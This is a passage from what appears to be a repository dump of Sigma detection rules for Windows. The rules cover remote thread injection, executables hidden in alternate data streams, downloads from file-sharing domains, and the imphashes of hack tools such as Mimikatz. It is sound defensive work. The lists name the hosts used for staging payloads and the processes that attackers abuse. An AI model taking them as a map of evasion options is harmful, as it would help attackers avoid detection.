    "content": "title: Rare Remote Thread Creation By Uncommon Source Image\nid: 02d1d718-dd13-41af-989d-ea85c7fab93f\nrelated:\n    - id: 66d31e5f-52d6-40a4-9615-002d3789a119\n      type: derived\nstatus: test\ndescription: Detects uncommon processes creating remote threads.\nreferences:\n    - Personal research, statistical analysis\n    - https://lolbas-project.github.io\nauthor: Perez Diego (@darkquassar), oscd.community\ndate: 2019-10-27\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\bash.exe'\n            - '\\cscript.exe'\n            - '\\cvtres.exe'\n            - '\\defrag.exe'\n            - '\\dialer.exe'\n            - '\\dnx.exe'\n            - '\\esentutl.exe'\n            - '\\excel.exe'\n            - '\\expand.exe'\n            - '\\find.exe'\n            - '\\findstr.exe'\n            - '\\forfiles.exe'\n            - '\\gpupdate.exe'\n            - '\\hh.exe'\n            - '\\installutil.exe'\n            - '\\lync.exe'\n            - '\\makecab.exe'\n            - '\\mDNSResponder.exe'\n            - '\\monitoringhost.exe' # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.\n            - '\\msbuild.exe'\n            - '\\mshta.exe'\n            - '\\mspaint.exe'\n            - '\\outlook.exe'\n            - '\\ping.exe'\n            - '\\provtool.exe'\n            - '\\python.exe'\n            - '\\regsvr32.exe'\n            - '\\robocopy.exe'\n            - '\\runonce.exe'\n            - '\\sapcimc.exe'\n            - '\\smartscreen.exe'\n            - '\\spoolsv.exe'\n            - '\\tstheme.exe'\n            - '\\userinit.exe'\n            - '\\vssadmin.exe'\n            - '\\vssvc.exe'\n            - '\\w3wp.exe'\n            - '\\winscp.exe'\n            - '\\winword.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_main_conhost:\n        SourceImage:\n            - 'C:\\Windows\\System32\\Defrag.exe'\n            - 'C:\\Windows\\System32\\makecab.exe'\n        TargetImage: 'C:\\Windows\\System32\\conhost.exe'\n    filter_main_provtol_svchost:\n        SourceImage: 'C:\\Windows\\System32\\provtool.exe'\n        TargetImage: 'C:\\Windows\\System32\\svchost.exe'\n    filter_main_provtool_system:\n        SourceImage: 'C:\\Windows\\System32\\provtool.exe'\n        TargetImage: 'System'\n    filter_main_userinit:\n        SourceImage: 'C:\\Windows\\System32\\userinit.exe'\n        TargetImage: 'C:\\Windows\\explorer.exe'\n    filter_main_winword:\n        SourceImage|endswith: '\\WINWORD.EXE'\n        TargetImage|startswith:\n            - 'C:\\Program Files (x86)\\' # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\n            - 'C:\\Program Files\\' # C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\AI\\ai.exe\n    filter_main_ms_office:\n        # Raised by following issue: https://github.com/SigmaHQ/sigma/issues/5529\n        SourceImage|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n        TargetImage: 'System'\n    filter_optional_explorer_vmtools:\n        SourceImage|endswith: '\\SysWOW64\\explorer.exe'\n        TargetImage:\n            - 'C:\\Program Files (x86)\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml",
    "content": "title: Remote Thread Creation By Uncommon Source Image\nid: 66d31e5f-52d6-40a4-9615-002d3789a119\nrelated:\n    - id: 02d1d718-dd13-41af-989d-ea85c7fab93f\n      type: derived\nstatus: test\ndescription: Detects uncommon processes creating remote threads.\nreferences:\n    - Personal research, statistical analysis\n    - https://lolbas-project.github.io\nauthor: Perez Diego (@darkquassar), oscd.community\ndate: 2019-10-27\nmodified: 2025-07-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\explorer.exe'\n            - '\\iexplore.exe'\n            - '\\msiexec.exe'\n            - '\\powerpnt.exe'\n            - '\\schtasks.exe'\n            - '\\winlogon.exe'\n    filter_main_winlogon_1:\n        SourceImage: 'C:\\Windows\\System32\\winlogon.exe'\n        TargetImage:\n            - 'C:\\Windows\\System32\\services.exe' # happens on Windows 7\n            - 'C:\\Windows\\System32\\wininit.exe' # happens on Windows 7\n            - 'C:\\Windows\\System32\\csrss.exe' # multiple OS\n            - 'C:\\Windows\\System32\\LogonUI.exe' # multiple OS\n            - 'C:\\Windows\\System32\\wlrmdr.exe'\n            - 'C:\\Windows\\System32\\AtBroker.exe'\n            - 'C:\\Windows\\System32\\dwm.exe'\n            - 'C:\\Windows\\System32\\fontdrvhost.exe'\n            - 'C:\\Windows\\System32\\userinit.exe'\n    filter_main_winlogon_2:\n        SourceImage: 'C:\\Windows\\System32\\winlogon.exe'\n        TargetParentProcessId: 4\n    filter_main_schtasks_conhost:\n        SourceImage:\n            - 'C:\\Windows\\System32\\schtasks.exe'\n            - 'C:\\Windows\\SysWOW64\\schtasks.exe'\n        TargetImage: 'C:\\Windows\\System32\\conhost.exe'\n    filter_main_explorer:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_system:\n        TargetImage: 'System'\n    filter_main_msiexec_1:\n        # Note: MSI installers will trigger this\n        SourceImage|endswith: '\\msiexec.exe'\n        TargetImage|contains:\n            - '\\AppData\\Local\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\' # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\n    filter_main_msiexec_2:\n        SourceImage|endswith: '\\msiexec.exe'\n        TargetImage:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_main_iexplore:\n        SourceImage: 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n        TargetImage:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n    filter_main_powerpnt:\n        SourceImage|endswith: '\\POWERPNT.EXE'\n        TargetImage|contains:\n            - 'C:\\Program Files\\Microsoft Office\\' # C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\AI\\ai.exe\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n    filter_optional_aurora_smartconsole1:\n        SourceImage: 'C:\\Program Files\\internet explorer\\iexplore.exe'\n        SourceCommandLine|contains|all:\n            - 'https://'\n            - '.checkpoint.com/documents/'\n            - 'SmartConsole_OLH/'\n            - 'default.htm#cshid='\n    filter_optional_aurora_smartconsole2:\n        SourceImage: 'C:\\Program Files\\internet explorer\\iexplore.exe'\n        SourceParentImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        SourceParentImage|contains|all:\n            - '\\CheckPoint\\SmartConsole\\'\n            - '\\SmartConsole.exe'\n    filter_optional_powerpnt:\n        # Raised by the following issue: https://github.com/SigmaHQ/sigma/issues/2479\n        SourceImage|contains: '\\Microsoft Office\\'\n        SourceImage|endswith: '\\POWERPNT.EXE'\n        TargetImage: 'C:\\Windows\\System32\\csrss.exe'\n    filter_main_null:\n        TargetImage: null\n    filter_main_empty:\n        TargetImage: ''\n    filter_optional_onedrive:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n    filter_optional_aurora:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\aurora-dashboard.exe'\n    filter_optional_officesetup:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\OfficeSetup.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml",
    "content": "title: Remote Thread Creation In Uncommon Target Image\nid: a1a144b7-5c9b-4853-a559-2172be8d4a03\nrelated:\n    - id: f016c716-754a-467f-a39e-63c06f773987\n      type: obsolete\nstatus: test\ndescription: Detects uncommon target processes for remote thread creation\nreferences:\n    - https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-16\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.003\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\calc.exe'\n            - '\\calculator.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\ping.exe'\n            - '\\sethc.exe'\n            - '\\spoolsv.exe'\n            - '\\wordpad.exe'\n            - '\\write.exe'\n    filter_main_csrss:\n        SourceImage: 'C:\\Windows\\System32\\csrss.exe'\n    filter_main_notepad:\n        SourceImage:\n            - 'C:\\Windows\\System32\\explorer.exe'\n            - 'C:\\Windows\\System32\\OpenWith.exe'\n        TargetImage: 'C:\\Windows\\System32\\notepad.exe'\n    filter_main_sethc:\n        SourceImage: 'C:\\Windows\\System32\\AtBroker.exe'\n        TargetImage: 'C:\\Windows\\System32\\Sethc.exe'\n    filter_optional_aurora_1:\n        StartFunction: 'EtwpNotificationThread'\n    filter_optional_aurora_2:\n        SourceImage|contains: 'unknown process'\n    filter_optional_vmtoolsd:\n        SourceImage: 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n        StartFunction: 'GetCommandLineW'\n        TargetImage:\n            - 'C:\\Windows\\System32\\notepad.exe'\n            - 'C:\\Windows\\System32\\spoolsv.exe'\n    filter_optional_xerox_pjems:\n        SourceImage: 'C:\\Program Files\\Xerox\\XeroxPrintExperience\\CommonFiles\\XeroxPrintJobEventManagerService.exe'\n        StartFunction: 'LoadLibraryW'\n        TargetImage: 'C:\\Windows\\System32\\spoolsv.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml",
    "content": "title: Remote Thread Creation Ttdinject.exe Proxy\nid: c15e99a3-c474-48ab-b9a7-84549a7a9d16\nstatus: test\ndescription: Detects a remote thread creation of Ttdinject.exe used as proxy\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nauthor: frack113\ndate: 2022-05-16\nmodified: 2022-06-02\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith: '\\ttdinject.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml",
    "content": "title: Hidden Executable In NTFS Alternate Data Stream\nid: b69888d4-380c-45ce-9cf9-d9ce46e67821\nstatus: test\ndescription: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash\nreferences:\n    - https://twitter.com/0xrawsec/status/1002478725605273600?s=21\nauthor: Florian Roth (Nextron Systems), @0xrawsec\ndate: 2018-06-03\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\n    definition: 'Requirements: Sysmon or equivalent configured with Imphash logging'\ndetection:\n    selection:\n        Hash|contains: 'IMPHASH='\n    filter_main_null:\n        Hash|contains: 'IMPHASH=00000000000000000000000000000000'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml",
    "content": "title: Creation Of a Suspicious ADS File Outside a Browser Download\nid: 573df571-a223-43bc-846e-3f98da481eca\nstatus: test\ndescription: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers\nreferences:\n    - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/\nauthor: frack113\ndate: 2022-10-22\nmodified: 2023-06-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|startswith: '[ZoneTransfer]  ZoneId=3'\n        TargetFilename|endswith: ':Zone.Identifier'\n        TargetFilename|contains:\n            - '.exe'\n            - '.scr'\n            - '.bat'\n            - '.cmd'\n            - '.docx'\n            - '.hta'\n            - '.jse'\n            - '.lnk'\n            - '.pptx'\n            - '.ps'\n            - '.reg'\n            - '.sct'\n            - '.vb'\n            - '.wsc'\n            - '.wsf'\n            - '.xlsx'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    filter_optional_snipping_tool:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_'\n        Image|endswith: '\\SnippingTool\\SnippingTool.exe'\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Packages\\Microsoft.ScreenSketch_'\n            - '\\TempState\\Screenshot '\n        TargetFilename|endswith: '.png:Zone.Identifier'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate browsers not currently included in the filter (please add them)\n    - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml",
    "content": "title: Suspicious File Download From File Sharing Websites -  File Stream\nid: 52182dfb-afb7-41db-b4bc-5336cb29b464\nrelated:\n    - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99\n      type: similar\nstatus: test\ndescription: Detects the download of suspicious file type from a well-known file and paste sharing domain\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection_domain:\n        Contents|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_extension:\n        TargetFilename|contains:\n            - '.cpl:Zone'\n            - '.dll:Zone'\n            - '.exe:Zone'\n            - '.hta:Zone'\n            - '.lnk:Zone'\n            - '.one:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.xll:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Some false positives might occur with binaries download via Github\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml",
    "content": "title: Unusual File Download From File Sharing Websites - File Stream\nid: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99\nrelated:\n    - id: 52182dfb-afb7-41db-b4bc-5336cb29b464\n      type: similar\nstatus: test\ndescription: Detects the download of suspicious file type from a well-known file and paste sharing domain\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection_domain:\n        Contents|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_extension:\n        TargetFilename|contains:\n            - '.bat:Zone'\n            - '.cmd:Zone'\n            - '.ps1:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml",
    "content": "title: HackTool Named File Stream Created\nid: 19b041f6-e583-40dc-b842-d6fa8011493f\nstatus: test\ndescription: Detects the creation of a named file stream with the imphash of a well-known hack tool\nreferences:\n    - https://github.com/gentilkiwi/mimikatz\n    - https://github.com/topotam/PetitPotam\n    - https://github.com/ohpe/juicy-potato\n    - https://github.com/antonioCoco/RoguePotato\n    - https://www.tarasco.org/security/pwdump_7/\n    - https://github.com/fortra/nanodump\n    - https://github.com/codewhitesec/HandleKatz\n    - https://github.com/xuanxuan0/DripLoader\n    - https://github.com/hfiref0x/UACME\n    - https://github.com/outflanknl/Dumpert\n    - https://github.com/wavestone-cdt/EDRSandblast\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\n    definition: 'Requirements: Sysmon config with Imphash logging activated'\ndetection:\n    selection:\n        Hash|contains: # Sysmon field hashes contains all types\n            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam\n            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam\n            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam\n            - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz\n            - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz\n            - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz\n            - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz\n            - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz\n            - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz\n            - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz\n            - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz\n            - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz\n            - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz\n            - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz\n            - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz\n            - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz\n            - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz\n            - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz\n            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato\n            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato\n            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG\n            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato\n            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato\n            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato\n            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato\n            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump\n            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump\n            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump\n            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump\n            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump\n            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump\n            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump\n            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump\n            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump\n            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX\n            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump\n            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump\n            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump\n            - IMPHASH=730073214094CD328547BF1F72289752 # Htran\n            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons\n            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons\n            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons\n            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons\n            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump\n            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump\n            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump\n            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump\n            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump\n            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump\n            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump\n            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump\n            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump\n            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump\n            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump\n            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump\n            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump\n            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump\n            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump\n            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump\n            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump\n            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz\n            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz\n            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader\n            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader\n            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader\n            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader\n            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump\n            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi\n            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi\n            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi\n            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi\n            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi\n            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi\n            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi\n            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi\n            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi\n            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi\n            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi\n            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE\n            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE\n            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers\n            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert\n            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert\n            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert\n            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte\n            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet\n            - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook\n            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz\n            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller\n            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller\n            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab\n            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab\n            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab\n            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia\n            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast\n            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast\n            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast\n            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast\n            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast\n            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast\n            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast\n            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: 